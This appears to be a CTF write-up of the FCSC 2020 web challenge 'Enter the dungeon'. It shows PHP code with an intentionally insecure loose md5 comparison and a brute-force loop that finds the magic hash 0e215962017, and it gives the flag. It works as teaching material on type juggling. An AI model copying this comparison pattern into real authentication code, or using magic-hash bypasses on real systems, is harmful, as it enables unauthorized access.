.net acl ads android avr azure azuread blockchain bof brop bruteforce bytecode c chip8 core crypto ctf ctf cve dcsync dex dll dns docker dump ecdsa elf embedded emualtor emulatio emulation ethereum exploit flask fmt forensic gameboy gdb gtfobins hardware hash heap htb ida iis javascript js juggling keepass leak lfi linux logrotate luks marshal md5 misc msql network nosqli osint patch pcap pdf pe pe pentest php pickle pip postgresql powershell privesc prng pwn pyjail pyning python random registry ret2csu reverse rfi rop runpe saleae serialization services smali smb sql sqli sqli ssp/ap suid tensorflow tor tricks truncation ulimit unicorn upload upx vb volatility vulnhub wasm web window windows winrm wireshark x32dbg x64 xor xss z3 zip

FCSC 2020 - Enter the dungeon (web)

29/04/2020 :: 22:00

web

ctf

juggling

php

Web - Enter the dungeon

After looking at the source code we can find the backend source code at : http://challenges2.france-cybersecurity-challenge.fr:5002/check_secret.txt

 <?php
    session_start();
    $_SESSION['dungeon_master'] = 0;
?>
<html>
<head>
    <title>Enter The Dungeon</title>
</head>
<body style="background-color:#3CB371;">
<center><h1>Enter The Dungeon</h1></center>
<?php
    echo '<div style="font-size:85%;color:purple">For security reason, secret check is disable !</div><br />';
    echo '<pre>'.chr(10);
    include('./ecsc.txt');
    echo chr(10).'</pre>';
    // authentication is replaced by an impossible test
    //if(md5($_GET['secret']) == "a5de2c87ba651432365a5efd928ee8f2")
    if(md5($_GET['secret']) == $_GET['secret'])
    {
        $_SESSION['dungeon_master'] = 1;
        echo "Secret is correct, welcome Master ! You can now enter the dungeon";
        
    }
    else
    {
        echo "Wrong secret !";
    }
?>
</body></html>

Following the code we need something as

md5($_GET['secret']) == $_GET['secret']

This should be quite hard to find but not impossible I think. But will take so much time to find a string when md5 hashed give the same string.

However the php comparison operator used is == which is a loose comparison, meaning that it compare types before comparing value, for example.

 php > echo "1000" == 1000;                                                                
1
php > echo "0e123456" == 0;
1
echo "0e1787" == "0e9880";
1

Lot of stuff related to this here : https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

So I wanted to find a string like 0eX where is X is whatever digit as long as needed and that the md5 of this string starts with 0e.

 <?php
  for( $i = 0;; $i++) {
    $test = "0e".$i;
    if( md5($test) == $test) {
      echo $test;
    }
  }
?>

And after few minute it found : 0e215962017 and we can verify it before sending it.

 php > echo md5("0e215962017") == "0e215962017";
1

flag : FCSC{f67aaeb3b15152b216cb1addbf0236c66f9d81c4487c4db813c1de8603bb2b5b}**

	<?php
	session_start();
	$_SESSION['dungeon_master'] = 0;
	?>
	<html>
	<head>
	<title>Enter The Dungeon</title>
	</head>
	<body style="background-color:#3CB371;">
	<center><h1>Enter The Dungeon</h1></center>
	<?php
	echo '<div style="font-size:85%;color:purple">For security reason, secret check is disable !</div><br />';
	echo '<pre>'.chr(10);
	include('./ecsc.txt');
	echo chr(10).'</pre>';

	// authentication is replaced by an impossible test
	//if(md5($_GET['secret']) == "a5de2c87ba651432365a5efd928ee8f2")
	if(md5($_GET['secret']) == $_GET['secret'])
	{
	$_SESSION['dungeon_master'] = 1;
	echo "Secret is correct, welcome Master ! You can now enter the dungeon";

	}
	else
	{
	echo "Wrong secret !";
	}
	?>
	</body></html>

	php > echo "1000" == 1000;
	1
	php > echo "0e123456" == 0;
	1
	echo "0e1787" == "0e9880";
	1

	<?php

	for( $i = 0;; $i++) {
	$test = "0e".$i;
	if( md5($test) == $test) {
	echo $test;
	}
	}

	?>